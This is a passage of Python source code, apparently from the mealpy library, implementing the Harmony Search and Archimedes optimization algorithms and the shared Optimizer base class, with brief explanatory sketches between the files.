"""
def __init__(self, problem, epoch=10000, pop_size=100, n_new=50, c_r=0.95, pa_r=0.05, **kwargs):
"""
Args:
epoch (int): maximum number of iterations, default = 10000
pop_size (int): number of population size, default = 100
            n_new (int): Number of New Harmonies, default = 50
            c_r (float): Harmony Memory Consideration Rate, default = 0.95
            pa_r (float): Pitch Adjustment Rate, default = 0.05
"""
super().__init__(problem, kwargs)
self.nfe_per_epoch = pop_size
self.sort_flag = False
self.epoch = epoch
self.pop_size = pop_size
self.n_new = n_new
self.c_r = c_r
self.pa_r = pa_r
self.fw = 0.0001 * (self.problem.ub - self.problem.lb) # Fret Width (Bandwidth)
self.fw_damp = 0.9995 # Fret Width Damp Ratio
self.dyn_fw = self.fw
def evolve(self, epoch):
"""
Args:
epoch (int): The current iteration
"""
pop_new = []
for idx in range(0, self.pop_size):
# Create New Harmony Position
pos_new = np.random.uniform(self.problem.lb, self.problem.ub)
delta = self.dyn_fw * np.random.normal(self.problem.lb, self.problem.ub)
# Use Harmony Memory
pos_new = np.where(np.random.uniform(0, 1, self.problem.n_dims) < self.c_r, self.g_best[self.ID_POS], pos_new)
# Pitch Adjustment
x_new = pos_new + delta
pos_new = np.where(np.random.uniform(0, 1, self.problem.n_dims) < self.pa_r, x_new, pos_new)
pos_new = self.amend_position_faster(pos_new) # Check the bound
pop_new.append([pos_new, None])
pop_new = self.update_fitness_population(pop_new)
# Update Damp Fret Width
self.dyn_fw = self.dyn_fw * self.fw_damp
# Merge Harmony Memory and New Harmonies, Then sort them, Then truncate extra harmonies
self.pop = self.get_sorted_strim_population(self.pop + pop_new, self.pop_size)
class OriginalHS(BaseHS):
"""
Original version of: Harmony Search (HS)
A New Heuristic Optimization Algorithm: Harmony Search
Link:
"""
def __init__(self, problem, epoch=10000, pop_size=100, n_new=50, c_r=0.95, pa_r=0.05, **kwargs):
"""
Args:
epoch (int): maximum number of iterations, default = 10000
pop_size (int): number of population size, default = 100
            n_new (int): Number of New Harmonies, default = 50
            c_r (float): Harmony Memory Consideration Rate, default = 0.95
            pa_r (float): Pitch Adjustment Rate, default = 0.05
"""
super().__init__(problem, epoch, pop_size, n_new, c_r, pa_r, **kwargs)
self.nfe_per_epoch = pop_size
self.sort_flag = False
def evolve(self, epoch):
"""
Args:
epoch (int): The current iteration
"""
pop_new = []
for idx in range(0, self.pop_size):
pos_new = np.random.uniform(self.problem.lb, self.problem.ub)
for j in range(self.problem.n_dims):
# Use Harmony Memory
if np.random.uniform() <= self.c_r:
random_index = np.random.randint(0, self.pop_size)
pos_new[j] = self.pop[random_index][self.ID_POS][j]
# Pitch Adjustment
if np.random.uniform() <= self.pa_r:
delta = self.dyn_fw * np.random.normal(self.problem.lb, self.problem.ub) # Gaussian(Normal)
pos_new[j] = pos_new[j] + delta[j]
pos_new = self.amend_position_faster(pos_new)
pop_new.append([pos_new, None])
pop_new = self.update_fitness_population(pop_new)
# Update Damp Fret Width
self.dyn_fw = self.dyn_fw * self.fw_damp
# Merge Harmony Memory and New Harmonies, Then sort them, Then truncate extra harmonies
self.pop = self.get_sorted_strim_population(self.pop + pop_new, self.pop_size)
```
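A standalone sketch of the vectorized trick that lets BaseHS drop the per-dimension loop of OriginalHS: the harmony-memory consideration and the pitch adjustment are applied to all dimensions at once with `np.where` masks. For simplicity the Gaussian step here uses a standard normal, whereas the class above draws it with `np.random.normal(self.problem.lb, self.problem.ub)`; the bounds and rates are illustrative.
```python
import numpy as np

np.random.seed(1)
n_dims = 8
lb, ub = np.full(n_dims, -5.0), np.full(n_dims, 5.0)
c_r, pa_r = 0.95, 0.05
fret_width = 0.0001 * (ub - lb)

memory_best = np.random.uniform(lb, ub)   # stands in for the g_best harmony
pos_new = np.random.uniform(lb, ub)       # fresh random harmony

# Harmony memory consideration: copy a dimension from memory with probability c_r
pos_new = np.where(np.random.uniform(0, 1, n_dims) < c_r, memory_best, pos_new)

# Pitch adjustment: perturb a dimension with probability pa_r
delta = fret_width * np.random.normal(0, 1, n_dims)
pos_new = np.where(np.random.uniform(0, 1, n_dims) < pa_r, pos_new + delta, pos_new)

pos_new = np.clip(pos_new, lb, ub)        # same effect as amend_position_faster
print(pos_new)
```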
#### File: mealpy/mealpy/optimizer.py
```python
import numpy as np
from math import gamma
from copy import deepcopy
from mealpy.utils.history import History
from mealpy.problem import Problem
from mealpy.utils.termination import Termination
import concurrent.futures as parallel
import time
class Optimizer:
""" This is base class of all Algorithms """
    ## Assumption: a solution has the format [position, [target, [obj1, obj2, ...]]]
ID_POS = 0 # Index of position/location of solution/agent
ID_FIT = 1 # Index of fitness value of solution/agent
ID_TAR = 0 # Index of target (the final fitness) in fitness
ID_OBJ = 1 # Index of objective list in fitness
EPSILON = 10E-10
def __init__(self, problem, kwargs):
"""
Args:
problem: Design your problem based on the format of the Problem class
Examples:
problem = {
"obj_func": your objective function,
"lb": list of value
"ub": list of value
"minmax": "min" or "max"
"verbose": True or False
"n_dims": int (Optional)
"batch_idea": True or False (Optional)
"batch_size": int (Optional, smaller than population size)
"obj_weight": list weights for all your objectives (Optional, default = [1, 1, ...1])
}
"""
super(Optimizer, self).__init__()
self.epoch, self.pop_size, self.solution = None, None, None
self.mode = "sequential"
self.pop, self.g_best = None, None
self.history = History()
if not isinstance(problem, Problem):
problem = Problem(problem)
self.problem = problem
self.verbose = problem.verbose
self.termination_flag = False # Check if exist object or not
if "termination" in kwargs:
termination = kwargs["termination"]
if not isinstance(termination, Termination):
print("Please create and input your Termination object!")
exit(0)
else:
self.termination = termination
self.termination_flag = True
self.nfe_per_epoch = self.pop_size
self.sort_flag = False
def termination_start(self):
if self.termination_flag:
if self.termination.mode == 'TB':
self.count_terminate = time.time()
elif self.termination.mode == 'ES':
self.count_terminate = 0
elif self.termination.mode == 'MG':
self.count_terminate = self.epoch
else: # number of function evaluation (NFE)
self.count_terminate = self.pop_size # First out of loop
else:
pass
def initialization(self):
self.pop = self.create_population(self.pop_size)
if self.sort_flag:
self.pop, self.g_best = self.get_global_best_solution(self.pop) # We sort the population
else:
_, self.g_best = self.get_global_best_solution(self.pop) # We don't sort the population
def before_evolve(self, epoch):
pass
def after_evolve(self, epoch):
pass
def solve(self, mode='sequential'):
"""
Args:
mode (str): 'sequential', 'thread', 'process'
+ 'sequential': recommended for simple and small task (< 10 seconds for calculating objective)
+ 'thread': recommended for IO bound task, or small computing task (< 2 minutes for calculating objective)
+ 'process': recommended for hard and big task (> 2 minutes for calculating objective)
Returns:
[position, fitness value]
"""
self.mode = mode
self.termination_start()
self.initialization()
self.history.save_initial_best(self.g_best)
for epoch in range(0, self.epoch):
time_epoch = time.time()
## Call before evolve function
self.before_evolve(epoch)
## Evolve method will be called in child class
self.evolve(epoch)
## Call after evolve function
self.after_evolve(epoch)
# update global best position
if self.sort_flag:
self.pop, self.g_best = self.update_global_best_solution(self.pop) # We sort the population
else:
_, self.g_best = self.update_global_best_solution(self.pop) # We don't sort the population
## Additional information for the framework
time_epoch = time.time() - time_epoch
self.history.list_epoch_time.append(time_epoch)
self.history.list_population.append(deepcopy(self.pop))
self.print_epoch(epoch + 1, time_epoch)
if self.termination_flag:
if self.termination.mode == 'TB':
if time.time() - self.count_terminate >= self.termination.quantity:
self.termination.logging(self.verbose)
break
elif self.termination.mode == 'FE':
self.count_terminate += self.nfe_per_epoch
if self.count_terminate >= self.termination.quantity:
self.termination.logging(self.verbose)
break
elif self.termination.mode == 'MG':
if epoch >= self.termination.quantity:
self.termination.logging(self.verbose)
break
else: # Early Stopping
temp = self.count_terminate + self.history.get_global_repeated_times(self.ID_FIT, self.ID_TAR, self.EPSILON)
if temp >= self.termination.quantity:
self.termination.logging(self.verbose)
break
## Additional information for the framework
self.save_optimization_process()
return self.solution[self.ID_POS], self.solution[self.ID_FIT][self.ID_TAR]
def evolve(self, epoch):
pass
def create_solution(self):
"""
Returns:
            A solution with 2 elements: the position and the fitness wrapper
The general format: [position, [target, [obj1, obj2, ...]]]
## To get the position, fitness wrapper, target and obj list
## A[self.ID_POS] --> Return: position
## A[self.ID_FIT] --> Return: [target, [obj1, obj2, ...]]
## A[self.ID_FIT][self.ID_TAR] --> Return: target
## A[self.ID_FIT][self.ID_OBJ] --> Return: [obj1, obj2, ...]
"""
position = np.random.uniform(self.problem.lb, self.problem.ub)
fitness = self.get_fitness_position(position=position)
return [position, fitness]
def create_population(self, pop_size=None):
"""
Args:
            pop_size (int): number of solutions to create, default = self.pop_size (the processing mode is taken from self.mode)
Returns:
population: list of solutions/agents
"""
if pop_size is None:
pop_size = self.pop_size
pop = []
if self.mode == "thread":
with parallel.ThreadPoolExecutor() as executor:
list_executors = [executor.submit(self.create_solution) for _ in range(pop_size)]
                # This method yields results as each thread finishes its job (not in submission order)
for f in parallel.as_completed(list_executors):
pop.append(f.result())
elif self.mode == "process":
with parallel.ProcessPoolExecutor() as executor:
list_executors = [executor.submit(self.create_solution) for _ in range(pop_size)]
                # This method yields results as each process finishes its job (not in submission order).
for f in parallel.as_completed(list_executors):
pop.append(f.result())
else:
pop = [self.create_solution() for _ in range(0, pop_size)]
return pop
def update_fitness_population(self, pop=None):
"""
Args:
            pop (list): the population to (re-)evaluate (the processing mode is taken from self.mode)
Returns:
population: with updated fitness value
"""
if self.mode == "thread":
with parallel.ThreadPoolExecutor() as executor:
list_results = executor.map(self.get_fitness_solution, pop) # Return result not the future object
for idx, fit in enumerate(list_results):
pop[idx][self.ID_FIT] = fit
elif self.mode == "process":
with parallel.ProcessPoolExecutor() as executor:
list_results = executor.map(self.get_fitness_solution, pop) # Return result not the future object
for idx, fit in enumerate(list_results):
pop[idx][self.ID_FIT] = fit
else:
for idx, agent in enumerate(pop):
pop[idx][self.ID_FIT] = self.get_fitness_solution(agent)
return pop
def get_fitness_position(self, position=None):
"""
Args:
position (nd.array): 1-D numpy array
Returns:
[target, [obj1, obj2, ...]]
"""
objs = self.problem.obj_func(position)
if not self.problem.obj_is_list:
objs = [objs]
fit = np.dot(objs, self.problem.obj_weight)
return [fit, objs]
def get_fitness_solution(self, solution=None):
"""
Args:
solution (list): A solution with format [position, [target, [obj1, obj2, ...]]]
Returns:
[target, [obj1, obj2, ...]]
"""
return self.get_fitness_position(solution[self.ID_POS])
def get_global_best_solution(self, pop: list):
"""
Sort population and return the sorted population and the best solution
Args:
pop (list): The population of pop_size individuals
Returns:
Sorted population and global best solution
"""
sorted_pop = sorted(pop, key=lambda agent: agent[self.ID_FIT][self.ID_TAR]) # Already returned a new sorted list
if self.problem.minmax == "min":
return sorted_pop, deepcopy(sorted_pop[0])
else:
return sorted_pop, deepcopy(sorted_pop[-1])
def get_better_solution(self, agent1: list, agent2: list):
"""
Args:
agent1 (list): A solution
agent2 (list): Another solution
Returns:
The better solution between them
"""
if self.problem.minmax == "min":
if agent1[self.ID_FIT][self.ID_TAR] < agent2[self.ID_FIT][self.ID_TAR]:
return deepcopy(agent1)
return deepcopy(agent2)
else:
if agent1[self.ID_FIT][self.ID_TAR] < agent2[self.ID_FIT][self.ID_TAR]:
return deepcopy(agent2)
return deepcopy(agent1)
def compare_agent(self, agent_a: list, agent_b: list):
"""
Args:
agent_a (list): Solution a
agent_b (list): Solution b
Returns:
            boolean: True if solution a is better than solution b, otherwise False
"""
if self.problem.minmax == "min":
if agent_a[self.ID_FIT][self.ID_TAR] < agent_b[self.ID_FIT][self.ID_TAR]:
return True
return False
else:
if agent_a[self.ID_FIT][self.ID_TAR] < agent_b[self.ID_FIT][self.ID_TAR]:
return False
return True
def get_special_solutions(self, pop=None, best=3, worst=3):
"""
Args:
pop (list): The population
best (int): Top k1 best solutions, default k1=3, it can be None
worst (int): Top k2 worst solutions, default k2=3, it can be None
Returns:
sorted_population, k1 best solutions and k2 worst solutions
"""
if self.problem.minmax == "min":
pop = sorted(pop, key=lambda agent: agent[self.ID_FIT][self.ID_TAR])
else:
pop = sorted(pop, key=lambda agent: agent[self.ID_FIT][self.ID_TAR], reverse=True)
if best is None:
if worst is None:
exit(0)
else:
                return pop, None, deepcopy(pop[-worst:])
else:
if worst is None:
return pop, deepcopy(pop[:best]), None
else:
                return pop, deepcopy(pop[:best]), deepcopy(pop[-worst:])
def get_special_fitness(self, pop=None):
"""
Args:
pop (list): The population
Returns:
Total fitness, best fitness, worst fitness
"""
total_fitness = np.sum([agent[self.ID_FIT][self.ID_TAR] for agent in pop])
if self.problem.minmax == "min":
pop = sorted(pop, key=lambda agent: agent[self.ID_FIT][self.ID_TAR])
else:
pop = sorted(pop, key=lambda agent: agent[self.ID_FIT][self.ID_TAR], reverse=True)
return total_fitness, pop[0][self.ID_FIT][self.ID_TAR], pop[-1][self.ID_FIT][self.ID_TAR]
def update_global_best_solution(self, pop=None, save=True):
"""
Update the global best solution saved in variable named: self.history_list_g_best
Args:
pop (list): The population of pop_size individuals
save (bool): True if you want to add new current global best and False if you just want update the current one.
Returns:
Sorted population and the global best solution
"""
if self.problem.minmax == "min":
sorted_pop = sorted(pop, key=lambda agent: agent[self.ID_FIT][self.ID_TAR])
else:
sorted_pop = sorted(pop, key=lambda agent: agent[self.ID_FIT][self.ID_TAR], reverse=True)
current_best = sorted_pop[0]
# self.history_list_c_best.append(current_best)
# better = self.get_better_solution(current_best, self.history_list_g_best[-1])
# self.history_list_g_best.append(better)
if save:
self.history.list_current_best.append(current_best)
better = self.get_better_solution(current_best, self.history.list_global_best[-1])
self.history.list_global_best.append(better)
return deepcopy(sorted_pop), deepcopy(better)
else:
local_better = self.get_better_solution(current_best, self.history.list_current_best[-1])
self.history.list_current_best[-1] = local_better
global_better = self.get_better_solution(current_best, self.history.list_global_best[-1])
self.history.list_global_best[-1] = global_better
return deepcopy(sorted_pop), deepcopy(global_better)
def print_epoch(self, epoch, runtime):
"""
Print out the detailed information of training process
Args:
epoch (int): current iteration
runtime (float): the runtime for current iteration
"""
if self.verbose:
print(f"> Epoch: {epoch}, Current best: {self.history.list_current_best[-1][self.ID_FIT][self.ID_TAR]}, "
f"Global best: {self.history.list_global_best[-1][self.ID_FIT][self.ID_TAR]}, Runtime: {runtime:.5f} seconds")
def save_optimization_process(self):
"""
Detail: Save important data for later use such as:
+ history_list_g_best_fit
+ history_list_c_best_fit
+ history_list_div
+ history_list_explore
+ history_list_exploit
"""
# self.history_list_g_best_fit = [agent[self.ID_FIT][self.ID_TAR] for agent in self.history_list_g_best]
# self.history_list_c_best_fit = [agent[self.ID_FIT][self.ID_TAR] for agent in self.history_list_c_best]
#
# # Draw the exploration and exploitation line with this data
# self.history_list_div = np.ones(self.epoch)
# for idx, pop in enumerate(self.history_list_pop):
# pos_matrix = np.array([agent[self.ID_POS] for agent in pop])
# div = np.mean(abs((np.median(pos_matrix, axis=0) - pos_matrix)), axis=0)
# self.history_list_div[idx] = np.mean(div, axis=0)
# div_max = np.max(self.history_list_div)
# self.history_list_explore = 100 * (self.history_list_div / div_max)
# self.history_list_exploit = 100 - self.history_list_explore
self.history.epoch = len(self.history.list_global_best)
self.history.list_global_best_fit = [agent[self.ID_FIT][self.ID_TAR] for agent in self.history.list_global_best]
self.history.list_current_best_fit = [agent[self.ID_FIT][self.ID_TAR] for agent in self.history.list_current_best]
# Draw the exploration and exploitation line with this data
self.history.list_diversity = np.ones(self.history.epoch)
for idx, pop in enumerate(self.history.list_population):
pos_matrix = np.array([agent[self.ID_POS] for agent in pop])
div = np.mean(abs((np.median(pos_matrix, axis=0) - pos_matrix)), axis=0)
self.history.list_diversity[idx] = np.mean(div, axis=0)
div_max = np.max(self.history.list_diversity)
self.history.list_exploration = 100 * (self.history.list_diversity / div_max)
self.history.list_exploitation = 100 - self.history.list_exploration
self.solution = self.history.list_global_best[-1]
## Crossover techniques
def get_index_roulette_wheel_selection(self, list_fitness: np.array):
"""
This method can handle min/max problem, and negative or positive fitness value.
Args:
list_fitness (nd.array): 1-D numpy array
Returns:
Index of selected solution
"""
scaled_fitness = (list_fitness - np.min(list_fitness)) / (np.ptp(list_fitness) + self.EPSILON)
if self.problem.minmax == "min":
final_fitness = 1.0 - scaled_fitness
else:
final_fitness = scaled_fitness
total_sum = sum(final_fitness)
r = np.random.uniform(low=0, high=total_sum)
for idx, f in enumerate(final_fitness):
r = r + f
if r > total_sum:
return idx
return np.random.choice(range(0, len(list_fitness)))
def get_solution_kway_tournament_selection(self, pop: list, k_way=0.2, output=2):
if 0 < k_way < 1:
k_way = int(k_way * len(pop))
k_way = round(k_way)
list_id = np.random.choice(range(len(pop)), k_way, replace=False)
list_parents = [pop[i] for i in list_id]
list_parents = sorted(list_parents, key=lambda agent: agent[self.ID_FIT][self.ID_TAR])
if self.problem.minmax == "min":
return list_parents[:output]
else:
return list_parents[-output:]
def get_levy_flight_step(self, beta=1.0, multiplier=0.001, case=0):
"""
Parameters
----------
        multiplier (float, optional): default = 0.001
beta: [0-2]
+ 0-1: small range --> exploit
+ 1-2: large range --> explore
case: 0, 1, -1
+ 0: return multiplier * s * np.random.uniform()
+ 1: return multiplier * s * np.random.normal(0, 1)
+ -1: return multiplier * s
"""
        # u and v are two random variables which follow a normal (Gaussian) distribution
# sigma_u : standard deviation of u
sigma_u = np.power(gamma(1 + beta) * np.sin(np.pi * beta / 2) / (gamma((1 + beta) / 2) * beta * np.power(2, (beta - 1) / 2)), 1 / beta)
# sigma_v : standard deviation of v
sigma_v = 1
u = np.random.normal(0, sigma_u ** 2)
v = np.random.normal(0, sigma_v ** 2)
s = u / np.power(abs(v), 1 / beta)
if case == 0:
step = multiplier * s * np.random.uniform()
elif case == 1:
step = multiplier * s * np.random.normal(0, 1)
else:
step = multiplier * s
return step
def levy_flight(self, epoch=None, position=None, g_best_position=None, step=0.001, case=0):
"""
Parameters
----------
epoch (int): current iteration
position : 1-D numpy np.array
g_best_position : 1-D numpy np.array
step (float, optional): 0.001
        case (int, optional): 0, 1, 2, 3
"""
beta = 1
        # muy and v are two random variables which follow a normal (Gaussian) distribution
# sigma_muy : standard deviation of muy
sigma_muy = np.power(gamma(1 + beta) * np.sin(np.pi * beta / 2) / (gamma((1 + beta) / 2) * beta * np.power(2, (beta - 1) / 2)), 1 / beta)
# sigma_v : standard deviation of v
sigma_v = 1
muy = np.random.normal(0, sigma_muy ** 2)
v = np.random.normal(0, sigma_v ** 2)
s = muy / np.power(abs(v), 1 / beta)
levy = np.random.uniform(self.problem.lb, self.problem.ub) * step * s * (position - g_best_position)
if case == 0:
return levy
elif case == 1:
return position + 1.0 / np.sqrt(epoch + 1) * np.sign(np.random.random() - 0.5) * levy
elif case == 2:
return position + np.random.normal(0, 1, len(self.problem.lb)) * levy
elif case == 3:
return position + 0.01 * levy
def amend_position(self, position=None):
"""
Args:
position (): vector position (location) of the solution.
Returns:
Amended position (make the position is in bound)
"""
return np.maximum(self.problem.lb, np.minimum(self.problem.ub, position))
def amend_position_faster(self, position=None):
"""
        This method is faster than "amend_position" in most cases.
Args:
position (): vector position (location) of the solution.
Returns:
Amended position
"""
return np.clip(position, self.problem.lb, self.problem.ub)
def amend_position_random(self, position=None):
"""
        If the solution is out of bounds in some dimension, that dimension is re-assigned a random location within the domain
Args:
position (): vector position (location) of the solution.
Returns:
Amended position
"""
return np.where(np.logical_and(self.problem.lb <= position, position <= self.problem.ub),
position, np.random.uniform(self.problem.lb, self.problem.ub))
def get_global_best_global_worst_solution(self, pop=None):
"""
Args:
pop (): The population
Returns:
The global best and the global worst solution
"""
# Already returned a new sorted list
sorted_pop = sorted(pop, key=lambda agent: agent[self.ID_FIT][self.ID_TAR])
if self.problem.minmax == "min":
return deepcopy(sorted_pop[0]), deepcopy(sorted_pop[-1])
else:
return deepcopy(sorted_pop[-1]), deepcopy(sorted_pop[0])
### Survivor Selection
def greedy_selection_population(self, pop_old=None, pop_new=None):
"""
Args:
pop_old (): The current population
pop_new (): The next population
Returns:
The new population with better solutions
"""
len_old, len_new = len(pop_old), len(pop_new)
if len_old != len_new:
print("Pop old and Pop new should be the same length!")
exit(0)
if self.problem.minmax == "min":
return [pop_new[i] if pop_new[i][self.ID_FIT][self.ID_TAR] < pop_old[i][self.ID_FIT][self.ID_TAR]
else pop_old[i] for i in range(len_old)]
else:
            return [pop_new[i] if pop_new[i][self.ID_FIT][self.ID_TAR] > pop_old[i][self.ID_FIT][self.ID_TAR]
else pop_old[i] for i in range(len_old)]
def get_sorted_strim_population(self, pop=None, pop_size=None, reverse=False):
"""
Args:
pop (list): The population
pop_size (int): The number of population
Returns:
The sorted population with pop_size size
"""
if self.problem.minmax == "min":
pop = sorted(pop, key=lambda agent: agent[self.ID_FIT][self.ID_TAR], reverse=reverse)
else:
            pop = sorted(pop, key=lambda agent: agent[self.ID_FIT][self.ID_TAR], reverse=not reverse)
return pop[:pop_size]
def create_opposition_position(self, agent=None, g_best=None):
"""
Args:
agent (): The current agent
g_best (): the global best solution
Returns:
The opposite solution
"""
return self.problem.lb + self.problem.ub - g_best[self.ID_POS] + np.random.uniform() * (g_best[self.ID_POS] - agent[self.ID_POS])
def get_parent_kway_tournament_selection(self, pop=None, k_way=0.2, output=2):
if 0 < k_way < 1:
k_way = int(k_way * len(pop))
list_id = np.random.choice(range(len(pop)), k_way, replace=False)
list_parents = [pop[i] for i in list_id]
list_parents = sorted(list_parents, key=lambda temp: temp[self.ID_FIT])
return list_parents[:output]
### Crossover
def crossover_arthmetic_recombination(self, dad_pos=None, mom_pos=None):
r = np.random.uniform() # w1 = w2 when r =0.5
w1 = np.multiply(r, dad_pos) + np.multiply((1 - r), mom_pos)
w2 = np.multiply(r, mom_pos) + np.multiply((1 - r), dad_pos)
return w1, w2
#### Improved techniques can be used in any algorithms: 1
## Based on this paper: An efficient equilibrium optimizer with mutation strategy for numerical optimization (but still different)
    ## This scheme is used after the original update and consists of 4 steps:
    ## s1: sort the population, take the best half (p1) for the next round
## s2: do the mutation for p1, using greedy method to select the better solution
## s3: do the search mechanism for p1 (based on global best solution and the updated p1 above), to make p2 population
## s4: construct the new population for next generation
def improved_ms(self, pop=None, g_best=None): ## m: mutation, s: search
pop_len = int(len(pop) / 2)
## Sort the updated population based on fitness
pop = sorted(pop, key=lambda item: item[self.ID_FIT])
pop_s1, pop_s2 = pop[:pop_len], pop[pop_len:]
## Mutation scheme
pop_new = []
for i in range(0, pop_len):
agent = deepcopy(pop_s1[i])
pos_new = pop_s1[i][self.ID_POS] * (1 + np.random.normal(0, 1, self.problem.n_dims))
agent[self.ID_POS] = self.amend_position_faster(pos_new)
pop_new.append(agent)
pop_new = self.update_fitness_population(pop_new)
pop_s1 = self.greedy_selection_population(pop_s1, pop_new) ## Greedy method --> improved exploitation
## Search Mechanism
pos_s1_list = [item[self.ID_POS] for item in pop_s1]
pos_s1_mean = np.mean(pos_s1_list, axis=0)
pop_new = []
for i in range(0, pop_len):
agent = deepcopy(pop_s2[i])
pos_new = (g_best[self.ID_POS] - pos_s1_mean) - np.random.random() * \
(self.problem.lb + np.random.random() * (self.problem.ub - self.problem.lb))
agent[self.ID_POS] = self.amend_position_faster(pos_new)
pop_new.append(agent)
        ## Keep the diversity of the population and still improve the exploration
pop_s2 = self.update_fitness_population(pop_new)
pop_s2 = self.greedy_selection_population(pop_s2, pop_new)
## Construct a new population
pop = pop_s1 + pop_s2
return pop
```
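To show how the pieces of the `Optimizer` base class fit together, here is a minimal, hypothetical subclass: it only defines `__init__` and `evolve()` and reuses `create_population`, `update_fitness_population`, `amend_position_faster` and `greedy_selection_population` exactly like the algorithms in this collection. The random-walk update itself is illustrative only, not an algorithm shipped by the library.
```python
import numpy as np
from mealpy.optimizer import Optimizer

class RandomWalkOptimizer(Optimizer):
    """Hypothetical minimal algorithm: every agent takes a Gaussian step, better steps are kept."""

    def __init__(self, problem, epoch=1000, pop_size=50, step_size=0.1, **kwargs):
        super().__init__(problem, kwargs)
        self.nfe_per_epoch = pop_size
        self.sort_flag = False
        self.epoch = epoch
        self.pop_size = pop_size
        self.step_size = step_size

    def evolve(self, epoch):
        pop_new = []
        for idx in range(0, self.pop_size):
            # Gaussian perturbation around the current position
            pos_new = self.pop[idx][self.ID_POS] + self.step_size * np.random.normal(0, 1, self.problem.n_dims)
            pos_new = self.amend_position_faster(pos_new)
            pop_new.append([pos_new, None])
        pop_new = self.update_fitness_population(pop_new)
        # Keep the better of the old and the new agent, index by index
        self.pop = self.greedy_selection_population(self.pop, pop_new)
```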
#### File: mealpy/physics_based/ArchOA.py
```python
import numpy as np
from copy import deepcopy
from mealpy.optimizer import Optimizer
class OriginalArchOA(Optimizer):
"""
The original version of: Archimedes Optimization Algorithm (ArchOA)
(Archimedes optimization algorithm: a new metaheuristic algorithm for solving optimization problems)
Link:
https://doi.org/10.1007/s10489-020-01893-z
"""
ID_POS = 0
ID_FIT = 1
ID_DEN = 2 # Density
ID_VOL = 3 # Volume
ID_ACC = 4 # Acceleration
def __init__(self, problem, epoch=10000, pop_size=100, c1=2, c2=6, c3=2, c4=0.5, acc_upper=0.9, acc_lower=0.1, **kwargs):
"""
Args:
problem ():
epoch (int): maximum number of iterations, default = 10000
pop_size (int): number of population size, default = 100
            c1 (int): default = 2, usually belongs to [1, 2]
            c2 (int): default = 6, usually belongs to {2, 4, 6}
            c3 (int): default = 2, usually belongs to [1, 2]
            c4 (float): default = 0.5, usually belongs to [0.5, 1]
acc_upper (float): Default 0.9
acc_lower (float): Default 0.1
**kwargs ():
"""
super().__init__(problem, kwargs)
self.nfe_per_epoch = pop_size
self.sort_flag = False
self.epoch = epoch
self.pop_size = pop_size
self.c1 = c1
self.c2 = c2
self.c3 = c3
self.c4 = c4
self.acc_upper = acc_upper
self.acc_lower = acc_lower
def create_solution(self):
"""
Returns:
The position position with 2 element: index of position/location and index of fitness wrapper
The general format: [position, [target, [obj1, obj2, ...]], density, volume, acceleration]
## To get the position, fitness wrapper, target and obj list
## A[self.ID_POS] --> Return: position
## A[self.ID_FIT] --> Return: [target, [obj1, obj2, ...]]
## A[self.ID_FIT][self.ID_TAR] --> Return: target
## A[self.ID_FIT][self.ID_OBJ] --> Return: [obj1, obj2, ...]
"""
position = np.random.uniform(self.problem.lb, self.problem.ub)
fitness = self.get_fitness_position(position=position)
den = np.random.uniform(self.problem.lb, self.problem.ub)
vol = np.random.uniform(self.problem.lb, self.problem.ub)
acc = self.problem.lb + np.random.uniform(self.problem.lb, self.problem.ub) * (self.problem.ub - self.problem.lb)
return [position, fitness, den, vol, acc]
def evolve(self, epoch):
"""
Args:
epoch (int): The current iteration
"""
## Transfer operator Eq. 8
tf = np.exp((epoch + 1) / self.epoch - 1)
## Density decreasing factor Eq. 9
ddf = np.exp(1 - (epoch + 1) / self.epoch) - (epoch + 1) / self.epoch
list_acc = []
## Calculate new density, volume and acceleration
for i in range(0, self.pop_size):
# Update density and volume of each object using Eq. 7
new_den = self.pop[i][self.ID_DEN] + np.random.uniform() * (self.g_best[self.ID_DEN] - self.pop[i][self.ID_DEN])
new_vol = self.pop[i][self.ID_VOL] + np.random.uniform() * (self.g_best[self.ID_VOL] - self.pop[i][self.ID_VOL])
# Exploration phase
if tf <= 0.5:
# Update acceleration using Eq. 10 and normalize acceleration using Eq. 12
id_rand = np.random.choice(list(set(range(0, self.pop_size)) - {i}))
new_acc = (self.pop[id_rand][self.ID_DEN] + self.pop[id_rand][self.ID_VOL] * self.pop[id_rand][self.ID_ACC]) / (new_den * new_vol)
else:
new_acc = (self.g_best[self.ID_DEN] + self.g_best[self.ID_VOL] * self.g_best[self.ID_ACC]) / (new_den * new_vol)
list_acc.append(new_acc)
self.pop[i][self.ID_DEN] = new_den
self.pop[i][self.ID_VOL] = new_vol
min_acc = np.min(list_acc)
max_acc = np.max(list_acc)
## Normalize acceleration using Eq. 12
for i in range(0, self.pop_size):
self.pop[i][self.ID_ACC] = self.acc_upper * (self.pop[i][self.ID_ACC] - min_acc) / (max_acc - min_acc) + self.acc_lower
pop_new = []
for idx in range(0, self.pop_size):
solution = deepcopy(self.pop[idx])
if tf <= 0.5: # update position using Eq. 13
id_rand = np.random.choice(list(set(range(0, self.pop_size)) - {idx}))
pos_new = self.pop[idx][self.ID_POS] + self.c1 * np.random.uniform() * \
self.pop[idx][self.ID_ACC] * ddf * (self.pop[id_rand][self.ID_POS] - self.pop[idx][self.ID_POS])
else:
p = 2 * np.random.rand() - self.c4
f = 1 if p <= 0.5 else -1
t = self.c3 * tf
pos_new = self.g_best[self.ID_POS] + f * self.c2 * np.random.rand() * self.pop[idx][self.ID_ACC] * \
ddf * (t * self.g_best[self.ID_POS] - self.pop[idx][self.ID_POS])
solution[self.ID_POS] = self.amend_position_faster(pos_new)
pop_new.append(solution)
pop_new = self.update_fitness_population(pop_new)
self.pop = self.greedy_selection_population(self.pop, pop_new)
```
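A small sketch of how the transfer operator (Eq. 8) and the density decreasing factor (Eq. 9) used in `OriginalArchOA.evolve` behave over a run: `tf` grows from roughly exp(-1) towards 1 and switches the algorithm from exploration to exploitation once it passes 0.5, while `ddf` decays towards 0. The epoch count is illustrative.
```python
import numpy as np

epoch_max = 10
for epoch in range(epoch_max):
    tf = np.exp((epoch + 1) / epoch_max - 1)                              # Eq. 8
    ddf = np.exp(1 - (epoch + 1) / epoch_max) - (epoch + 1) / epoch_max   # Eq. 9
    phase = "exploration" if tf <= 0.5 else "exploitation"
    print(f"epoch={epoch:2d}  tf={tf:.3f}  ddf={ddf:.3f}  phase={phase}")
```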
#### File: mealpy/physics_based/EFO.py
```python
import numpy as np
from mealpy.optimizer import Optimizer
class BaseEFO(Optimizer):
"""
My version of : Electromagnetic Field Optimization (EFO)
(Electromagnetic field optimization: A physics-inspired metaheuristic optimization algorithm)
Link:
https://www.sciencedirect.com/science/article/abs/pii/S2210650215000528
Notes:
+ The flow of algorithm is changed like other metaheuristics.
+ Change equations using g_best solution
"""
